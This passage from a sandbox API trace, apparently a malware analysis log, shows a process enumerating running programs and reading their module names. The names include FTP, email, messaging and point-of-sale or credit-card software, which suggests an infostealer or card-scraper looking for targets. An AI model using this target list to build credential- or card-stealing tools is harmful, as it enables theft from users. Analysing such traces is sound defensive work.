cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.441] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0xfe0000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="columbia sep.exe") returned 0x10 [0108.441] CloseHandle (hObject=0x3ec) returned 1 [0108.441] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x240) returned 0x3ec [0108.441] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.443] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x1300000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="bk robbie.exe") returned 0xd [0108.443] CloseHandle (hObject=0x3ec) returned 1 [0108.443] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1c0) returned 0x3ec [0108.443] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.444] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x10b0000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="probability.exe") returned 0xf [0108.445] CloseHandle (hObject=0x3ec) returned 1 [0108.445] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x364) returned 0x3ec [0108.445] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.446] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0xa60000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="token.exe") returned 0x9 [0108.447] CloseHandle (hObject=0x3ec) returned 1 [0108.447] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x790) returned 0x3ec [0108.447] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.448] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x2c0000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="johnny.exe") returned 0xa [0108.448] CloseHandle (hObject=0x3ec) returned 1 [0108.448] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7cc) returned 0x3ec [0108.448] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.450] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0xec0000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="craft.exe") returned 0x9 [0108.451] CloseHandle (hObject=0x3ec) returned 1 [0108.451] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x308) returned 0x3ec [0108.451] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.452] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x12c0000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="corrections provincial.exe") returned 0x1a [0108.452] CloseHandle (hObject=0x3ec) returned 1 [0108.452] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x774) returned 0x3ec [0108.452] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.454] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0xde0000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="thorough th.exe") returned 0xf [0108.454] CloseHandle (hObject=0x3ec) returned 1 [0108.454] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7f4) returned 0x3ec [0108.454] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.455] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x10e0000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="consolidated.exe") returned 0x10 [0108.456] CloseHandle (hObject=0x3ec) returned 1 [0108.456] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x540) returned 0x3ec [0108.456] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.457] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0xdf0000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="bootsnatrobots.exe") returned 0x12 [0108.458] CloseHandle (hObject=0x3ec) returned 1 [0108.458] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7d0) returned 0x3ec [0108.458] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.459] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0xd0000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="incidents.exe") returned 0xd [0108.459] CloseHandle (hObject=0x3ec) returned 1 [0108.459] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7ac) returned 0x3ec [0108.459] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.461] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0xc60000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="stomachmerryperth.exe") returned 0x15 [0108.461] CloseHandle (hObject=0x3ec) returned 1 [0108.461] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4e4) returned 0x3ec [0108.461] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.462] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0xd00000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="ecommerce_came_incoming.exe") returned 0x1b [0108.463] CloseHandle (hObject=0x3ec) returned 1 [0108.463] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x35c) returned 0x3ec [0108.463] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.464] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x1f0000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="3dftp.exe") returned 0x9 [0108.464] CloseHandle (hObject=0x3ec) returned 1 [0108.465] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x248) returned 0x3ec [0108.465] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.466] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0xe10000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="absolutetelnet.exe") returned 0x12 [0108.466] CloseHandle (hObject=0x3ec) returned 1 [0108.466] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x700) returned 0x3ec [0108.466] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.468] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0xa20000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="alftp.exe") returned 0x9 [0108.468] CloseHandle (hObject=0x3ec) returned 1 [0108.468] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x434) returned 0x3ec [0108.468] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.469] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x220000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="barca.exe") returned 0x9 [0108.470] CloseHandle (hObject=0x3ec) returned 1 [0108.470] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x754) returned 0x3ec [0108.470] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.471] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0xd20000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="bitkinex.exe") returned 0xc [0108.471] CloseHandle (hObject=0x3ec) returned 1 [0108.472] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x560) returned 0x3ec [0108.472] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.473] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x1190000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="coreftp.exe") returned 0xb [0108.473] CloseHandle (hObject=0x3ec) returned 1 [0108.473] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7bc) returned 0x3ec [0108.473] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.475] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x10c0000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="far.exe") returned 0x7 [0108.475] CloseHandle (hObject=0x3ec) returned 1 [0108.475] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5d4) returned 0x3ec [0108.475] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.476] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0xa0000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="filezilla.exe") returned 0xd [0108.477] CloseHandle (hObject=0x3ec) returned 1 [0108.477] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7d4) returned 0x3ec [0108.477] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.478] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x11b0000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="flashfxp.exe") returned 0xc [0108.478] CloseHandle (hObject=0x3ec) returned 1 [0108.478] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x54c) returned 0x3ec [0108.479] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.480] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x11d0000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="fling.exe") returned 0x9 [0108.480] CloseHandle (hObject=0x3ec) returned 1 [0108.480] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x71c) returned 0x3ec [0108.481] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.482] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0xad0000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="foxmailincmail.exe") returned 0x12 [0108.482] CloseHandle (hObject=0x3ec) returned 1 [0108.482] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7a8) returned 0x3ec [0108.482] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.484] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x1a0000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="gmailnotifierpro.exe") returned 0x14 [0108.484] CloseHandle (hObject=0x3ec) returned 1 [0108.484] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7a4) returned 0x3ec [0108.484] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.485] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x9d0000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="icq.exe") returned 0x7 [0108.486] CloseHandle (hObject=0x3ec) returned 1 [0108.486] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x15c) returned 0x3ec [0108.486] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.487] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x1310000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="leechftp.exe") returned 0xc [0108.487] CloseHandle (hObject=0x3ec) returned 1 [0108.488] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x810) returned 0x3ec [0108.488] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.489] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x810000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="ncftp.exe") returned 0x9 [0108.489] CloseHandle (hObject=0x3ec) returned 1 [0108.489] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x820) returned 0x3ec [0108.489] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.491] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x1210000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="notepad.exe") returned 0xb [0108.491] CloseHandle (hObject=0x3ec) returned 1 [0108.491] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x830) returned 0x3ec [0108.491] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.492] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0xf50000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="operamail.exe") returned 0xd [0108.493] CloseHandle (hObject=0x3ec) returned 1 [0108.493] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x840) returned 0x3ec [0108.493] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.494] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0xdd0000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="outlook.exe") returned 0xb [0108.494] CloseHandle (hObject=0x3ec) returned 1 [0108.494] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x850) returned 0x3ec [0108.494] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.496] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0xce0000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="pidgin.exe") returned 0xa [0108.496] CloseHandle (hObject=0x3ec) returned 1 [0108.496] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x860) returned 0x3ec [0108.496] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.498] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x240000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="scriptftp.exe") returned 0xd [0108.498] CloseHandle (hObject=0x3ec) returned 1 [0108.498] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x870) returned 0x3ec [0108.498] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.499] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x900000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="skype.exe") returned 0x9 [0108.500] CloseHandle (hObject=0x3ec) returned 1 [0108.500] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x880) returned 0x3ec [0108.500] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.501] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0xbe0000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="smartftp.exe") returned 0xc [0108.501] CloseHandle (hObject=0x3ec) returned 1 [0108.501] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x890) returned 0x3ec [0108.501] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.503] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0xa60000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="thunderbird.exe") returned 0xf [0108.503] CloseHandle (hObject=0x3ec) returned 1 [0108.503] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8a0) returned 0x3ec [0108.503] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.504] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0xa20000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="totalcmd.exe") returned 0xc [0108.505] CloseHandle (hObject=0x3ec) returned 1 [0108.505] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8b0) returned 0x3ec [0108.505] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.506] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x11b0000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="trillian.exe") returned 0xc [0108.506] CloseHandle (hObject=0x3ec) returned 1 [0108.507] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8c0) returned 0x3ec [0108.507] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.508] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x910000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="webdrive.exe") returned 0xc [0108.508] CloseHandle (hObject=0x3ec) returned 1 [0108.508] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8d0) returned 0x3ec [0108.508] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.510] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x280000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="whatsapp.exe") returned 0xc [0108.510] CloseHandle (hObject=0x3ec) returned 1 [0108.510] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8e0) returned 0x3ec [0108.510] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.511] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x1150000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="winscp.exe") returned 0xa [0108.512] CloseHandle (hObject=0x3ec) returned 1 [0108.512] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8f0) returned 0x3ec [0108.512] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.513] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x10000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="yahoomessenger.exe") returned 0x12 [0108.513] CloseHandle (hObject=0x3ec) returned 1 [0108.513] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x900) returned 0x3ec [0108.513] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.515] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x1380000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="active-charge.exe") returned 0x11 [0108.515] CloseHandle (hObject=0x3ec) returned 1 [0108.515] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x910) returned 0x3ec [0108.515] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.516] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0xa60000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="accupos.exe") returned 0xb [0108.517] CloseHandle (hObject=0x3ec) returned 1 [0108.517] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x920) returned 0x3ec [0108.517] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.518] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x810000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="afr38.exe") returned 0x9 [0108.519] CloseHandle (hObject=0x3ec) returned 1 [0108.519] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x930) returned 0x3ec [0108.519] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.520] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0xef0000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="aldelo.exe") returned 0xa [0108.520] CloseHandle (hObject=0x3ec) returned 1 [0108.520] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x940) returned 0x3ec [0108.520] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.522] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x140000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="ccv_server.exe") returned 0xe [0108.522] CloseHandle (hObject=0x3ec) returned 1 [0108.522] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x950) returned 0x3ec [0108.522] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.523] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x9d0000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="centralcreditcard.exe") returned 0x15 [0108.524] CloseHandle (hObject=0x3ec) returned 1 [0108.524] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x960) returned 0x3ec [0108.524] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.525] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0xff0000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="creditservice.exe") returned 0x11 [0108.525] CloseHandle (hObject=0x3ec) returned 1 [0108.525] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x970) returned 0x3ec [0108.526] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.527] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0xb40000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="edcsvr.exe") returned 0xa [0108.527] CloseHandle (hObject=0x3ec) returned 1 [0108.527] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x980) returned 0x3ec [0108.527] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.529] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x12b0000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="fpos.exe") returned 0x8 [0108.529] CloseHandle (hObject=0x3ec) returned 1 [0108.529] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x990) returned 0x3ec [0108.529] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.530] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0xae0000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="isspos.exe") returned 0xa [0108.531] CloseHandle (hObject=0x3ec) returned 1 [0108.531] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9a0) returned 0x3ec [0108.531] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.532] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x1180000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="mxslipstream.exe") returned 0x10 [0108.532] CloseHandle (hObject=0x3ec) returned 1 [0108.532] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b0) returned 0x3ec [0108.532] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.534] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x1170000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="omnipos.exe") returned 0xb [0108.534] CloseHandle (hObject=0x3ec) returned 1 [0108.534] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9c0) returned 0x3ec [0108.534] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.535] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x9a0000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="spcwin.exe") returned 0xa [0108.536] CloseHandle (hObject=0x3ec) returned 1 [0108.536] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9d0) returned 0x3ec [0108.536] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, 